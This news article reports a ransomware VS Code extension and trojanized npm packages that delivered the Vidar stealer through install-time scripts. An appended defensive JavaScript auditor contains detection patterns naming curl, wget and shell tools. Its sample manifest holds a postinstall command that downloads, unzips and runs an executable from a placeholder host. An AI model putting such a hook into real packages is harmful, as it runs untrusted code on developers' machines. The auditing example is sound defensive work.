Devs Targeted: Ransomware Lurks in VS Code & npm

Warning: AI-Generated Ransomware in VS Code & Vidar Stealer in npm Packages Expose Massive Developer Risk. Are You Infected?
Warning: Your Dev Tools Could Be a Gateway for Ransomware.
  • A malicious Visual Studio Code extension named "susvsex" was discovered with built-in ransomware capabilities, likely created with AI assistance.
  • Separately, security researchers unearthed 17 trojanized npm packages that deploy the Vidar information-stealing malware, downloaded over 2,240 times.
  • Both threats have been removed from their respective platforms, but they highlight a dangerous trend of supply chain attacks targeting software developers.
  • The incidents serve as a critical reminder for developers to scrutinize extensions and packages before integrating them into their workflow.

Your Development Environment is Under Attack

In a stark warning to the developer community, researchers have exposed two separate but equally alarming supply chain attacks targeting the open-source ecosystem. A malicious Visual Studio Code (VS Code) extension was found containing ransomware, while a cluster of npm packages was caught distributing the notorious Vidar information stealer. These incidents prove that attackers are increasingly focusing on the tools developers trust most.

AI-Generated Ransomware Hits VS Code Marketplace

Cybersecurity researcher John Tuckner of Secure Annex flagged a malicious VS Code extension ominously titled "susvsex." The extension, uploaded by a user named "suspublisher18," made no effort to hide its nefarious purpose, with a description that read, "Automatically zips, uploads, and encrypts files."

Dubbed "vibe-coded," the extension appears to have been created with the help of AI, containing extraneous comments, placeholder variables, and glaring security flaws. In a shocking oversight, the package even included decryption tools and GitHub access keys to its own command-and-control (C2) server. Its core function was to activate upon launch, archive a target directory, exfiltrate the data, and then encrypt the original files. Fortunately, the target directory was a test folder, limiting its immediate impact.

Microsoft has since removed the extension from the official VS Code Marketplace.

Vidar Stealer Spreads Through Trojanized npm Packages

In a parallel discovery, Datadog Security Labs identified 17 malicious npm packages designed to infect systems with Vidar Stealer, a potent malware known for harvesting sensitive information. This campaign marks the first documented instance of Vidar being distributed via the npm registry.

A Deceptive Attack Chain

The threat actors, tracked as MUT-4831, published packages masquerading as benign software development kits (SDKs). Once a package was installed, the postinstall lifecycle script declared in its package.json ran automatically, downloading a ZIP archive containing the Vidar executable from an external server. The malware then used hard-coded Telegram and Steam accounts as intermediaries to locate its actual C2 server.

Before being taken down, the malicious libraries were downloaded at least 2,240 times. While many of these could be from automated scrapers, the potential for widespread infection was significant.

A Sobering Reminder for Open-Source Security

These attacks are part of a disturbing trend targeting the open-source software supply chain, affecting platforms like npm, PyPI, RubyGems, and now the VS Code Marketplace. They serve as a crucial reminder that developers must exercise extreme caution. It is vital to perform due diligence, review code and changelogs, and be wary of typosquatting and other social engineering tactics before installing any new tool or dependency.
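The attack chain above hinges on an install-time lifecycle script in package.json, and the review the article calls for can be partly automated. The following is an added example (not code from the article, Datadog, or npm) that audits a manifest's lifecycle hooks for commands that fetch remote content or unpack archives; the indicator patterns and the two sample manifests are constructed for illustration.

```javascript
// Added example: flag npm lifecycle scripts that download or unpack payloads.
// Hooks npm runs automatically at install time (the vector described above).
const LIFECYCLE_HOOKS = ["preinstall", "install", "postinstall", "prepare"];

// Heuristic indicators (constructed for this example, not an exhaustive list).
const INDICATORS = [
  { name: "remote-fetch", re: /\b(curl|wget|Invoke-WebRequest|iwr)\b|https?:\/\//i },
  { name: "archive",      re: /\b(unzip|tar|7z|Expand-Archive)\b|\.zip\b/i },
  { name: "node-runner",  re: /\bnode\s+\S+\.js\b/i },
  { name: "shell-exec",   re: /\b(powershell|cmd(\.exe)?|bash|sh)\b/i },
];

// Audit one parsed package.json object. Every lifecycle hook is reported so a
// reviewer sees it; severity rises when the command reaches out to the network.
// Returns [{ hook, command, indicators, severity }].
function auditManifest(manifest) {
  const scripts = (manifest && manifest.scripts) || {};
  const findings = [];
  for (const hook of LIFECYCLE_HOOKS) {
    const command = scripts[hook];
    if (typeof command !== "string") continue;
    const hits = INDICATORS.filter((i) => i.re.test(command)).map((i) => i.name);
    let severity = "low";
    if (hits.includes("remote-fetch")) severity = "high";
    else if (hits.length > 0) severity = "medium";
    findings.push({ hook, command, indicators: hits, severity });
  }
  return findings;
}

// Constructed sample manifests: a typical build-time hook and a hook resembling
// the download-then-unpack chain described in the article (placeholder host).
const BENIGN = {
  name: "example-sdk",
  scripts: { build: "tsc -p .", postinstall: "node scripts/patch-types.js" },
};
const SUSPICIOUS = {
  name: "example-sdk-helper",
  scripts: {
    postinstall:
      "curl -s https://example.invalid/bundle.zip -o b.zip && unzip b.zip && ./bundle.exe",
  },
};

for (const m of [BENIGN, SUSPICIOUS]) {
  console.log(m.name, JSON.stringify(auditManifest(m)));
}
```

Run it against the package.json of a dependency before installing (for example, from `npm pack` output or a registry tarball) rather than after, since the hooks fire during `npm install`.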
